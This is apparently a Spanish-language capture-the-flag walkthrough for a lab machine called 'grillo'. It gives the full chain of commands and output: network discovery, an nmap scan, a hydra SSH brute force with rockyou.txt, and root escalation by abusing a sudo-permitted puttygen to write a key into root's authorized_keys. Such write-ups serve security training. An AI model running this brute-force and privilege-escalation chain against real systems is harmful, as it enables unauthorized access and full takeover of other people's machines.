netdiscover
...
192.168.1.167
...
192.168.1.167nmap -p 0-65535 -T5 -A -sT -Pn -n 192.168.1.167 -oX scan.xml && xsltproc scan.xml -o scan.htmlfirefox scan.htmlLast updated
// Cambia la contraseña de ssh por favor melaniehydra -f -l melanie -P /usr/share/wordlists/rockyou.txt -s 22 ssh://192.168.1.167 -t 64 -I
...
[22][ssh] host: 192.168.1.167 login: melanie password: *****
[STATUS] attack finished for 192.168.1.167 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
...melanie@grillo:~$ sudo -l
...
User melanie may run the following commands on grillo:
(root) NOPASSWD: /usr/bin/puttygenmelanie@grillo:~$ puttygen -t rsa -b 4096 -O private-openssh -o id_rsa ## Generamos la llave, -t es el tipo de llave, -b la cantidad de bytes de esta, -O el formato de output y -o el nombre del archivo de output
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++
Enter passphrase to save key:
Re-enter passphrase to verify: ## Aquí se puede poner cualquier cosa
melanie@grillo:~$ chmod 600 id_rsa ## Le damos permisos 600 para que nos deje utilizarla
melanie@grillo:~$ sudo puttygen id_rsa -o /root/.ssh/authorized_keys -O public-openssh ## La cargamos aprovechando los privilegios root de puttygen al archivo de llaves autorizadas de rootscp melanie@192.168.1.167:/home/melanie/id_rsa . ## Descargamos la llave mediante scp
ssh -i id_rsa root@192.168.1.167 ## Nos conectamos por ssh como rootLast login: Sun Apr 21 11:35:18 2024 from 192.168.0.100
root@grillo:~# id
uid=0(root) gid=0(root) grupos=0(root)
root@grillo:~# cat /root/root.txt
*****
root@grillo:~#